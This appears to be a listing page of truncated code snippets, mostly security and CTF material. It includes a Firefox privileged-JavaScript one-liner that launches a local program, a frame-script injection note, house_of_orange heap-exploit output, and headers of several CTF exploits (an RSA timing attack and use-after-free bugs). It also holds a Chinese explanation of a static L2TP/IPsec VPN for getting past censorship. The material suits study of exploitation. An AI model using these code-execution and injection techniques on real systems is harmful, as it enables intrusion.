| #!/bin/sh | |
| # Convert a raw binary image into an ELF file suitable for loading into a disassembler | |
| cat > raw$$.ld <<EOF | |
| SECTIONS | |
| { | |
| EOF | |
| echo " . = $3;" >> raw$$.ld |
| Either put into a plugin or open error console to test: (Ctrl+Shift+J) -> paste -> click 'Evaluate' | |
| Enjoy, | |
| @_wirepair | |
| linux: | |
| var file=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);file.initWithPath("/usr/bin/gcalctool");var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(false, null, 0); | |
| Windows: | |
| var file=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsIFile);file.initWithPath("C:\\windows\\system32\\calc.exe");file.launch(); | |
| or |
由于路由管控系统的建立,实时动态黑洞路由已成为最有效的封锁手段,TCP连接重置和DNS污染成为次要手段,利用漏洞的穿墙方法已不再具有普遍意义。对此应对方法是多样化协议的VPN来抵抗识别。这里介绍一种太简单、有时很朴素的“穷人VPN”。
朴素VPN只需要一次内核配置(Linux内核),即可永久稳定运行,不需要任何用户态守护进程。所有流量转换和加密全部由内核完成,原生性能,开销几乎没有。静态配置,避免动态握手和参数协商产生指纹特征导致被识别。并且支持NAT,移动的内网用户可以使用此方法。支持广泛,基于L2TPv3标准,Linux内核3.2+都有支持,其他操作系统原则上也能支持。但有两个局限:需要root权限;一个隧道只支持一个用户。
朴素VPN利用UDP封装的静态L2TP隧道实现VPN,内核XFRM实现静态IPsec。实际上IP-in-IP隧道即可实现VPN,但是这种协议无法穿越NAT,因此必须利用UDP封装。内核3.18将支持Foo-over-UDP,在UDP里面直接封装IP,与静态的L2TP-over-UDP很类似。
| /* inject via | |
| ppmm.loadFrameScript("data:,<js source>", true); | |
| (where ppmm is the message manager, e.g. in shell.js) | |
| framescript documentation explains why this works[1] and | |
| the message manager docs[2] explain that the parent process | |
| manager defined as ppmm in shell.js[3] can be used. | |
| [1] https://developer.mozilla.org/en-US/Firefox/Multiprocess_Firefox/Frame_script_loading_and_lifetime |
| #!/bin/bash -e | |
| NETNS_FILE=/var/run/netns/mynet | |
| MNTNS_FILE=/var/run/ns/mynet_mnt | |
| if [[ ! -f $NETNS_FILE ]]; then | |
| ip netns add mynet | |
| ip link add mynet0 type veth peer name mynet1 | |
| ip link set mynet0 up |
| $ gcc house_of_orange.c -o house_of_orange | |
| house_of_orange.c: In function ‘main’: | |
| house_of_orange.c:39:29: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
| *(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */ | |
| ^ | |
| house_of_orange.c:42:30: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
| *(void **)(p1+0x80+0x30) = -1; | |
| ^ | |
| $ ./house_of_orange |
| #!/usr/bin/env python2 | |
| from pwn import * | |
| ### | |
| if len(sys.argv) > 1: | |
| DEBUG = False | |
| else: | |
| DEBUG = True |
| #-*- coding:utf-8 -*- | |
| ''' | |
| DEF CON 2017 Quals - Godzilla (Reverse) | |
| Timing attack on RSA decryption. | |
| Based on http://www.cs.jhu.edu/~fabian/courses/CS600.624/Timing-full.pdf | |
| Another solutions: | |
| https://gist.github.com/nneonneo/367240ae2d8e705bb9173a49a7c8b0cd by b2xiao | |
| https://gist.github.com/Riatre/caac24840b176cf843b3f66ad9a5eeaf by riatre |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <fcntl.h> | |
| #include <sys/wait.h> | |
| #include <sys/ioctl.h> | |
| #include <pthread.h> | |
| #define ALLOC_CTX _IO('t', 1) |
| #!/usr/bin/env python3 | |
| # | |
| # Exploit for "assignment" of GoogleCTF 2017 | |
| # | |
| # CTF-quality exploit... | |
| # | |
| # Slightly simplified and shortened explanation: | |
| # | |
| # The bug is a UAF of one or both values during add_assign() if a GC is | |
| # triggered during allocate_value(). The exploit first abuses this to leak a |
